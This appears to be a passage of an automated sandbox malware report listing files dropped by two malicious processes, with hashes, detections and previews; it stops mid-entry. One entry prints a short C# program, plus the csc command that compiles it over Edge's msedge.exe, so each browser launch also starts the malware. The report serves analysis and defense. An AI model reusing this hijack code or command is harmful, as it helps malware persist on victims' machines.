                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\ieM8OO0J4Y

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\jrUPKJd7ZN

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):114688
                                    Entropy (8bit):0.9746603542602881
                                    Encrypted:false
                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\jwiLW31HWP

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):49152
                                    Entropy (8bit):0.8180424350137764
                                    Encrypted:false
                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                    MD5:349E6EB110E34A08924D92F6B334801D
                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\lsdR7GeA5x

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\ozftHSqB08

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):0.08235737944063153
                                    Encrypted:false
                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\rrIxBV7bmT

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1373607036346451
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\t1E8T9JcjS

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tPHesCYJ2H

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.103465189601646
                                    Encrypted:false
                                    SSDEEP:3:IAGoLo/oWrcn:hIE
                                    MD5:B047811332B414F89FA080E78A21F5C9
                                    SHA1:B1F78C9E5E85E5FC22021C09A320E01FE4E67082
                                    SHA-256:7A259DC31DB6AA6F2B6FFF28EF6E3B8CB6DE6435C3B734CB0B2655B97BE9E2CB
                                    SHA-512:E7C2E5BE081D93D6F44A54C37850FBD827B4DECA05612C444D7DB514D62E2637B1F692BE50AFE5381C2F1646B61358922AD006B12D3C9EC235242EB654478A35
                                    Malicious:false
                                    Preview:ktRecMnMgupurlpAuEsyM3C99

                                    C:\Users\user\AppData\Local\Temp\tpiVuHvhdL

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1373607036346451
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.0.cs

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):420
                                    Entropy (8bit):5.049808837869983
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LCYgG9VNiFkD:JNVQIbSfhWLzIiFkMSfhWLCyVEFkD
                                    MD5:E36B3FFD5A7E48C30E6CEBD40469BAC1
                                    SHA1:704E4AB856F87587E6501460E9C8BA5B7E2A0871
                                    SHA-256:115C29BF901961250F9C23DC9E5984FA2A671DBC1F32044C1C9798C5D24BA7CB
                                    SHA-512:E21B2470F4E86CF9CEAEEB24083A74D9E3E00E11B6EFA7D9CDCBEC4AC2F08D04EFA1D6C05250A3E8ACEFD1363BF0D03EC0F0C80E25560D0093F304F009F53BE2
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"); } catch { } }).Start();. }.}.

                                    C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):266
                                    Entropy (8bit):5.103541493321732
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oCHhJ23ffpspKV9n:Hu7L//TRRzscQDZspKbn
                                    MD5:A33B40450053BD024246CA77C5048F78
                                    SHA1:08F49C5EBD7D1C9B60A8CDCB60F1E8C784ED3F9A
                                    SHA-256:0747DDD8515C2DDEA3FC9A10EEE046443C270BAC33344BE894AA8BA687446CDC
                                    SHA-512:27AA2F8EA065F93B4C7B4448ED8E9CAC3C5810242DA2762D46ECC336B1247BFF326869B7466B8A75834E2EAFB211DE9960BBE707494A31DA7C1D1EF0078B8D6D
                                    Malicious:true
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.0.cs"

                                    C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.out

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):758
                                    Entropy (8bit):5.252964305328497
                                    Encrypted:false
                                    SSDEEP:12:T0I/u7L//TRRzscQDZspKbuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AI/un/VRzstDeKax5DqBVKVrdFAMBJTH
                                    MD5:EEAFFF5A5B7B7FD3E564B5F44E5D4C66
                                    SHA1:FF89B9543850A0A270AAC62EF2CA85CB186D8331
                                    SHA-256:7DDA30D60609894DE2CCE4AF2726D107120743A7255AE8E8A02F0A34E27D9292
                                    SHA-512:25C5EB6A457C37C5BA6B304270EADD8E7F868F64059A793DFF28A1003FBFD33C678068DB09B127D2DFA45BC95CFA9E467F26A53A57C8B1A3F381DA34B444598E
                                    Malicious:false
                                    Preview:.C:\Blockcomcrt> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                    C:\Users\user\AppData\Local\Temp\zHoCQG8Zet

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1209886597424439
                                    Encrypted:false
                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\Desktop\RypOpByW.log

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    • Antivirus: Virustotal, Detection: 11%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\UjoVbfCg.log

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):23552
                                    Entropy (8bit):5.519109060441589
                                    Encrypted:false
                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 8%
                                    • Antivirus: Virustotal, Detection: 11%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\Vmjnufha.log

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    • Antivirus: Virustotal, Detection: 29%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\WuLVbyih.log

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    • Antivirus: Virustotal, Detection: 27%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\ZcxEZvOD.log

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):33792
                                    Entropy (8bit):5.541771649974822
                                    Encrypted:false
                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 29%
                                    • Antivirus: Virustotal, Detection: 27%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\bQCMLIKB.log

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 17%
                                    • Antivirus: Virustotal, Detection: 22%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    C:\Users\user\Desktop\cQVCqZDT.log

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):32256
                                    Entropy (8bit):5.631194486392901
                                    Encrypted:false
                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 25%
                                    • Antivirus: Virustotal, Detection: 29%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                    C:\Users\user\Desktop\fXTLLrxO.log

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 17%
                                    • Antivirus: Virustotal, Detection: 22%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                    C:\Users\user\Desktop\mVSSSdRf.log

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
